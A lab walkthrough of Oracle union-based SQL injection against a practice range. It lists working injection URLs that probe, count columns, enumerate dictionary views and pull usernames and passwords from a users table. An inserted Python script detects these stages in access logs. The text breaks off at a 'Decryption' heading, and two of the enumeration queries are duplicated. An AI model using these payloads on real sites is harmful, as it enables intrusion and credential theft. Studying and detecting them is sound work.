The target range used in this writeup is: 墨者学院

1. As with other databases, the injection point is detected by appending an AND condition and comparing the responses. Here and 1=1 and and 1=2 are used.
new_list.php?id=1 and 1=1
new_list.php?id=1 and 1=2

2. Use order by to determine the number of columns. order by 2 renders the page normally while order by 3 does not, so the current query has 2 columns.
new_list.php?id=1 order by 2

Page renders normally
new_list.php?id=1 order by 3

Page breaks, which shows the column count is two
3. Use a UNION query to find the echo (display) positions
new_list.php?id=-1 union select 'null','null' from dual

4. Query the database version information
new_list.php?id=-1 union select 'null',(select banner from sys.v_$version where rownum=1) from dual

5. Query the table names; usually the admin or user table is what to look for
First table
new_list.php?id=-1 union select 'null',(select table_name from user_tables where rownum=1) from dual

Second table
new_list.php?id=-1 union select 'null',(select table_name from user_tables where rownum=1 and table_name not in 'LOGMNR_SESSION_EVOLVE$') from dual

Third table
new_list.php?id=-1 union select 'null',(select table_name from user_tables where rownum=1 and table_name not in 'LOGMNR_SESSION_EVOLVE$' and table_name not in 'LOGMNR_GLOBAL$') from dual

Fuzzy search to get the table name
new_list.php?id=-1 union select 'null',(select table_name from user_tables where table_name like '%user%' and rownum=1) from dual
6. Query the column names
First column name
new_list.php?id=-1 union select 'null',(select column_name from user_tab_columns where table_name='sns_users' and rownum=1) from dual

Second column name
new_list.php?id=-1 union select 'null',(select column_name from user_tab_columns where rownum=1 and column_name not in 'USER_NAME') from dual
Third column name
new_list.php?id=-1 union select 'null',(select column_name from user_tab_columns where rownum=1 and column_name not in 'USER_NAME') from dual

Fourth column name: nothing is returned, so there are only 3
new_list.php?id=-1 union select 'null',(select column_name from user_tab_columns where rownum=1 and column_name not in 'USER_NAME' and column_name not in 'AGENT_NAME') from dual

7. Query the table data to obtain the contents of the account and password fields
new_list.php?id=-1 union select USER_NAME,USER_PWD from "sns_users" where rownum=1

new_list.php?id=-1 union select USER_NAME,USER_PWD from "sns_users" where rownum=1 and USER_NAME <> 'zhong'

new_list.php?id=-1 union select USER_NAME,USER_PWD from "sns_users" where rownum=1 and USER_NAME <> 'zhong' and USER_NAME not in 'hu'
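Seen from the defender's side, steps 1 through 7 above leave a very recognisable trail in the web server access log: a boolean probe pair (and 1=1 / and 1=2), an order by count, and then union select ... from dual queries against Oracle dictionary views (user_tables, user_tab_columns, sys.v_$version) walked with rownum=1. The following Python script is an added example, not part of the original writeup; it parses constructed access-log lines (invented here, in common log format) and flags request parameters that match those stages, so the whole enumeration chain from one client becomes visible. The rule names, the log lines and the sample client addresses are all constructed.

```python
import re
from urllib.parse import unquote_plus, urlsplit, parse_qsl

# Constructed sample access-log lines (not from the original page). The
# request shapes mirror the walkthrough: boolean probe, order by, union
# select against Oracle dictionary views. The last line is benign traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /new_list.php?id=1 HTTP/1.1" 200 5120
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /new_list.php?id=1%20and%201=1 HTTP/1.1" 200 5120
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /new_list.php?id=1%20and%201=2 HTTP/1.1" 200 310
10.0.0.5 - - [01/Jan/2024:10:00:04 +0000] "GET /new_list.php?id=1%20order%20by%203 HTTP/1.1" 500 0
10.0.0.5 - - [01/Jan/2024:10:00:05 +0000] "GET /new_list.php?id=-1%20union%20select%20'null',(select%20banner%20from%20sys.v_$version%20where%20rownum=1)%20from%20dual HTTP/1.1" 200 5200
10.0.0.7 - - [01/Jan/2024:10:00:06 +0000] "GET /new_list.php?id=42 HTTP/1.1" 200 5100
"""

# Common log format: client ident user [timestamp] "METHOD target HTTP/x" status size
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3}) (?P<size>\d+|-)'
)

# Detection rules, each keyed to one stage of the enumeration chain above.
# Rule names are constructed for this example.
RULES = [
    ("boolean_probe", re.compile(r"\band\s+\d+\s*=\s*\d+")),
    ("order_by_enum", re.compile(r"\border\s+by\s+\d+")),
    ("union_select", re.compile(r"\bunion\s+(?:all\s+)?select\b")),
    ("oracle_dual", re.compile(r"\bfrom\s+dual\b")),
    ("oracle_dictionary", re.compile(
        r"\b(?:user_tables|user_tab_columns|all_tables|all_tab_columns|sys\.v_\$version|v\$version)\b")),
    ("rownum_walk", re.compile(r"\brownum\s*=\s*\d+")),
]


def normalize(value):
    """Decode a parameter value into a canonical lowercase form before matching.

    Two unquote passes catch double-encoded payloads, inline /* */ comments
    (a common whitespace substitute) are replaced by spaces, and runs of
    whitespace are collapsed so the rules can use plain \\s+ separators.
    """
    s = unquote_plus(unquote_plus(value))
    s = re.sub(r"/\*.*?\*/", " ", s)
    return re.sub(r"\s+", " ", s).lower()


def match_rules(value):
    """Return the names of all rules that fire on one parameter value."""
    text = normalize(value)
    return [name for name, rx in RULES if rx.search(text)]


def analyze_log(text):
    """Parse log lines and return one finding per flagged request parameter."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip rather than guess
        query = urlsplit(m.group("target")).query
        # parse_qsl splits on the first '=' only, so 'rownum=1' inside a
        # value stays part of that value instead of becoming a new parameter.
        for param, value in parse_qsl(query, keep_blank_values=True):
            hits = match_rules(value)
            if hits:
                findings.append({
                    "client": m.group("client"),
                    "ts": m.group("ts"),
                    "param": param,
                    "status": int(m.group("status")),
                    "rules": hits,
                })
    return findings


def summarize_by_client(findings):
    """Collapse findings into {client: sorted list of distinct rules hit}.

    A single client that trips boolean_probe, order_by_enum and union_select
    in sequence is the enumeration chain of the walkthrough, which is a
    stronger signal than any one request on its own.
    """
    per_client = {}
    for f in findings:
        per_client.setdefault(f["client"], set()).update(f["rules"])
    return {c: sorted(rules) for c, rules in per_client.items()}


if __name__ == "__main__":
    found = analyze_log(SAMPLE_LOG)
    for f in found:
        print(f'{f["ts"]} {f["client"]} param={f["param"]} status={f["status"]} rules={",".join(f["rules"])}')
    print(summarize_by_client(found))
```

Run as-is to see the four flagged requests and the per-client summary; in practice the regexes would be tuned to the application (numeric id parameters should never legitimately contain "union" or "from dual", so false positives are rare for this kind of endpoint) and the per-client chain would feed an alert rather than a print.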
8. Decryption
